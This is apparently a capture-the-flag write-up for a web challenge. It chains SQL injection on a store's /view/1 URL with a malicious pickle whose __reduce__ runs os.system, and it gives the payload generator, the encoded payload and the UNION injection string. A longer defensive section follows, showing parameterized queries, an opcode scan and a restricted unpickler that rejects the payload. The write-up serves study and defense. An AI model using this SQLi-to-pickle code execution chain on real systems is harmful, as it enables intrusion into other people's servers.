C.O.P 🟡
Description
The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!
The source code of the page was provided.
Challenge
The /view/1 URL is vulnerable to SQL injection. The data returned by that query gets base64-decoded and unpickled, so we can exploit that to submit our own malicious pickle using a class's __reduce__ method.
We want to move the flag.txt file to a location we can access; the static folder is fine:
import base64
import pickle

class Payload:
    def __reduce__(self):
        # pickle will call os.system(<arg>) when this object is unpickled
        import os
        return (os.system, ('cp flag.txt application/static/flag.txt',))

print(base64.b64encode(pickle.dumps(Payload())))
This gives us: gASVQgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCdjcCBmbGFnLnR4dCBhcHBsaWNhdGlvbi9zdGF0aWMvZmxhZy50eHSUhZRSlC4=
From here we can chain the SQLi with a UNION to pass this pickle (URL-encode it if necessary):
' UNION SELECT '<our_pickle>' --%20
And boom, we get a broken webpage; from there we just have to navigate to /static/flag.txt to get the flag.
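The chain above works because of two separate defects, and each has a standard fix. The following is an added example, not the challenge's source code: it rebuilds the two bugs against a constructed in-memory SQLite table (the real schema is not in the writeup; the `items` table, its `data` column and the product record are assumptions), then shows the hardened versions beside them. The SQLi half contrasts string-built SQL with a bound parameter; the pickle half runs an opcode scan with `pickletools` and a `find_class` override that refuses every global lookup, and checks that the writeup's own payload is rejected before anything is called while an ordinary product record still loads. The unsafe loader is never run on the payload.

```python
import base64
import io
import pickle
import pickletools
import sqlite3


def make_db():
    """Constructed stand-in for the store's database (assumption: one
    `items` table whose `data` column is a base64-encoded pickled record)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT PRIMARY KEY, data TEXT)")
    record = base64.b64encode(pickle.dumps({"name": "pickle tee", "price": 12})).decode()
    conn.execute("INSERT INTO items (id, data) VALUES ('1', ?)", (record,))
    conn.commit()
    return conn


def lookup_vulnerable(conn, item_id):
    # The /view/<id> bug: the id is pasted into the SQL text, so a quote
    # plus a UNION lets the caller decide what comes back in `data`.
    query = f"SELECT data FROM items WHERE id = '{item_id}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def lookup_fixed(conn, item_id):
    # Bound parameter: the id is data, never SQL, however many quotes it holds.
    row = conn.execute("SELECT data FROM items WHERE id = ?", (item_id,)).fetchone()
    return row[0] if row else None


# Opcodes that import a name or invoke something. A plain product record
# (dicts, strings, numbers) needs none of them.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def risky_opcodes(data):
    """Names of risky opcodes present in a pickle stream, without loading it."""
    return sorted({op.name for op, _arg, _pos in pickletools.genops(data)} & RISKY_OPCODES)


class RestrictedUnpickler(pickle.Unpickler):
    # Defense in depth: even if a stream slips past the scan, no global
    # (os.system or anything else) can be resolved, so a __reduce__
    # payload fails before REDUCE ever runs.
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def load_record_unsafe(b64):
    # What the challenge app does: base64-decode, then pickle.loads on
    # bytes that came from a query the client controlled.
    return pickle.loads(base64.b64decode(b64))


def load_record_safe(b64):
    data = base64.b64decode(b64)
    found = risky_opcodes(data)
    if found:
        raise pickle.UnpicklingError(f"rejected: stream uses {found}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


# The writeup's payload: a pickle that calls os.system when loaded.
CHALLENGE_PAYLOAD = ("gASVQgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCdjcCBmbGFnLnR4dCBh"
                     "cHBsaWNhdGlvbi9zdGF0aWMvZmxhZy50eHSUhZRSlC4=")


def demo():
    conn = make_db()
    injected = "' UNION SELECT 'attacker-controlled' --"  # constructed probe
    results = {
        "vulnerable_returns_injected": lookup_vulnerable(conn, injected),
        "fixed_returns_nothing": lookup_fixed(conn, injected),
        "payload_opcodes": risky_opcodes(base64.b64decode(CHALLENGE_PAYLOAD)),
    }
    try:
        load_record_safe(CHALLENGE_PAYLOAD)
        results["payload_rejected"] = False
    except pickle.UnpicklingError:
        results["payload_rejected"] = True
    # The legitimate record still round-trips through the hardened loader.
    results["record_still_loads"] = load_record_safe(lookup_fixed(conn, "1"))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key} = {value}")
```

The opcode scan is the cheap detection: a base64 blob whose pickle contains STACK_GLOBAL or REDUCE has no business in a product record and can be logged and dropped before deserialization. The longer-term fix is to stop pickling web-facing data at all and store JSON, which has no notion of importing a callable.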